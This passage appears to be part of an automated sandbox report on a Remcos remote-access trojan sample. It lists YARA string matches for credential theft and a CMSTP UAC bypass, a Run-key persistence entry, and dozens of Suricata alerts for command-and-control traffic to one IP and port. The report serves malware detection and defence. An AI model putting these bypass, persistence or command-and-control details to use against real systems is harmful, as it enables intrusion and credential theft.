0x667d4:$str_b14: StopForward 0x66270:$str_b15: fso.DeleteFile " 0x66204:$str_b16: On Error Resume Next 0x662a0:$str_b17: fso.DeleteFolder " 0x65814:$str_b18: Uploaded file: 0x657d4:$str_b19: Unable to delete: 0x66238:$str_b20: while fso.FileExists(" 0x65cb1:$str_c0: [Firefox StoredLogins not found]
20.2.yavascript.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x655e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6557c:$s1: CoGetObject 0x65590:$s1: CoGetObject 0x655ac:$s1: CoGetObject 0x6f538:$s1: CoGetObject 0x6553c:$s2: Elevation:Administrator!new:
Click to see the 115 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\yavascript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ltlbVjClX9.exe, ProcessId: 6464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-0ZPVF8

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: ED C8 6F BF 32 CC 27 29 5A BC 42 18 D7 39 92 93 BC 68 3B 22 42 C9 60 5E 1A 32 A5 90 49 55 C9 B2 7D 76 F0 21 9C 34 C1 36 2C 74 6C BF EE CD 19 35 BA 25 D2 A5 21 45 E3 A1 73 96 ED 7B 81 94 CB 9C 89 2E 37 0E 0C 27 A0 88 87 21 B6 C0 75 40 EB 96 E6 13 BF AD 8C 71 1A 7C D1 58 AF D9 AC 1E , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\yavascript.exe, ProcessId: 2604, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0ZPVF8\exepath

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:24.849316+0200
SID:	2036594
Source Port:	49741
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:14.210243+0200
SID:	2036594
Source Port:	49787
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:58.488348+0200
SID:	2036594
Source Port:	49729
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:19.101998+0200
SID:	2036594
Source Port:	49819
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:14.846295+0200
SID:	2036594
Source Port:	49817
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:16.937426+0200
SID:	2036594
Source Port:	49738
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:22.210207+0200
SID:	2036594
Source Port:	49740
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:18.251631+0200
SID:	2036594
Source Port:	49789
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:26.178799+0200
SID:	2036594
Source Port:	49793
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:40.049607+0200
SID:	2036594
Source Port:	49800
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:19.570573+0200
SID:	2036594
Source Port:	49739
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:16.173539+0200
SID:	2036594
Source Port:	49788
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:20.332255+0200
SID:	2036594
Source Port:	49790
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:01.150194+0200
SID:	2036594
Source Port:	49730
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:27.456264+0200
SID:	2036594
Source Port:	49742
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:06.474561+0200
SID:	2036594
Source Port:	49733
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:07.972672+0200
SID:	2036594
Source Port:	49814
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:51.358621+0200
SID:	2036594
Source Port:	49752
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:03.842152+0200
SID:	2036594
Source Port:	49732
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:41.195335+0200
SID:	2036594
Source Port:	49772
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:09.080890+0200
SID:	2036594
Source Port:	49734
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:59.989288+0200
SID:	2036594
Source Port:	49810
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:38.935844+0200
SID:	2036594
Source Port:	49771
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:45.772159+0200
SID:	2036594
Source Port:	49750
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:24.237622+0200
SID:	2036594
Source Port:	49792
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:41.969666+0200
SID:	2036594
Source Port:	49801
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:03.977546+0200
SID:	2036594
Source Port:	49812
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:52.161542+0200
SID:	2036594
Source Port:	49777
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:07.019890+0200
SID:	2036594
Source Port:	49758
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:42.393942+0200
SID:	2036594
Source Port:	49714
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:54.041670+0200
SID:	2036594
Source Port:	49807
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:49.846572+0200
SID:	2036594
Source Port:	49805
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:40.517707+0200
SID:	2036594
Source Port:	49748
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:09.291961+0200
SID:	2036594
Source Port:	49785
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:55.847548+0200
SID:	2036594
Source Port:	49726
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:43.411661+0200
SID:	2036594
Source Port:	49773
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:17.551523+0200
SID:	2036594
Source Port:	49762
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:01.799791+0200
SID:	2036594
Source Port:	49756
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:00.708066+0200
SID:	2036594
Source Port:	49781
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:17.073684+0200
SID:	2036594
Source Port:	49818
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:37.904286+0200
SID:	2036594
Source Port:	49747
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:56.580595+0200
SID:	2036594
Source Port:	49754
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:36.702611+0200
SID:	2036594
Source Port:	49770
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:24.837901+0200
SID:	2036594
Source Port:	49765
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:47.751336+0200
SID:	2036594
Source Port:	49717
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:50.565712+0200
SID:	2036594
Source Port:	49721
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:12.547018+0200
SID:	2036594
Source Port:	49760
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:50.003397+0200
SID:	2036594
Source Port:	49776
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:53.983765+0200
SID:	2036594
Source Port:	49753
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:15.080442+0200
SID:	2036594
Source Port:	49761
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:45.595101+0200
SID:	2036594
Source Port:	49774
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:52.112058+0200
SID:	2036594
Source Port:	49806
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:53.209293+0200
SID:	2036594
Source Port:	49725
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:10.005594+0200
SID:	2036594
Source Port:	49759
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:07.147771+0200
SID:	2036594
Source Port:	49784
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:43.941679+0200
SID:	2036594
Source Port:	49802
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:43.145531+0200
SID:	2036594
Source Port:	49749
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:52:45.124039+0200
SID:	2036594
Source Port:	49715
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:59.171559+0200
SID:	2036594
Source Port:	49755
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:28.110454+0200
SID:	2036594
Source Port:	49794
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:19.985494+0200
SID:	2036594
Source Port:	49763
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:12.523994+0200
SID:	2036594
Source Port:	49816
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:35.317056+0200
SID:	2036594
Source Port:	49746
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:36.150131+0200
SID:	2036594
Source Port:	49798
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:48.773376+0200
SID:	2036594
Source Port:	49751
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:58.641569+0200
SID:	2036594
Source Port:	49780
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:30.098842+0200
SID:	2036594
Source Port:	49743
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:56.596805+0200
SID:	2036594
Source Port:	49779
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:34.225618+0200
SID:	2036594
Source Port:	49797
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:22.291022+0200
SID:	2036594
Source Port:	49791
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:29.583064+0200
SID:	2036594
Source Port:	49767
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:11.281725+0200
SID:	2036594
Source Port:	49786
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:54.284955+0200
SID:	2036594
Source Port:	49778
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:34.407246+0200
SID:	2036594
Source Port:	49769
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:30.319166+0200
SID:	2036594
Source Port:	49795
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:38.112019+0200
SID:	2036594
Source Port:	49799
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:27.226344+0200
SID:	2036594
Source Port:	49766
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:14.301231+0200
SID:	2036594
Source Port:	49737
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:56.034422+0200
SID:	2036594
Source Port:	49808
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:04.425981+0200
SID:	2036594
Source Port:	49757
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:45.894216+0200
SID:	2036594
Source Port:	49803
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:11.689339+0200
SID:	2036594
Source Port:	49736
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:47.879174+0200
SID:	2036594
Source Port:	49804
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:47.817526+0200
SID:	2036594
Source Port:	49775
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:02.795166+0200
SID:	2036594
Source Port:	49782
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:21.913218+0200
SID:	2036594
Source Port:	49820
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:06.001212+0200
SID:	2036594
Source Port:	49813
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:22.438768+0200
SID:	2036594
Source Port:	49764
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:04.816398+0200
SID:	2036594
Source Port:	49783
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:01.980454+0200
SID:	2036594
Source Port:	49811
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:56:10.588977+0200
SID:	2036594
Source Port:	49815
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:58.041715+0200
SID:	2036594
Source Port:	49809
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:53:32.704348+0200
SID:	2036594
Source Port:	49744
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:55:32.344177+0200
SID:	2036594
Source Port:	49796
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.5 - Destination IP: 198.23.227.212

Timestamp:	2024-08-02T13:54:32.083673+0200
SID:	2036594
Source Port:	49768
Destination Port:	32583
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ltlbVjClX9.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2409616641.0000000000698000.00000004.00000020.00020000.00000000.sdmp

